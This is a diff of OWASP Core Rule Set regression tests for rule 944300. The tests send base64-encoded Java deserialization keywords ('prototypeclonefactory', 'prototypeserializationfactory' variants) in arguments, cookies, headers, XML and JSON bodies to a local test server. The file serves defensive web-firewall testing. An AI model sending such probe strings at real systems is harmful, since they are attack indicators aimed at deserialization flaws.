Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-241 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 241 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-242 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" + output: + log: + expect_ids: [944300] + - test_id: 242 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-243 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 243 desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-244 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 244 desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-245 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" + output: + log: + expect_ids: [944300] + - test_id: 245 desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-246 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 246 desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-247 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 247 desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-248 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 248 desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-249 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 249 desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-250 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 250 desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-251 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 251 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-252 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 252 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-253 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 253 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-254 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 254 desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-255 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 255 desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-256 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" + output: + log: + expect_ids: [944300] + - test_id: 256 desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-257 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 257 desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-258 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 258 desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-259 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 259 desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-260 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 260 desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-261 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 261 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-262 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 262 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-263 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 263 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-264 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" + output: + log: + expect_ids: [944300] + - test_id: 264 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-265 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 265 desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-266 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 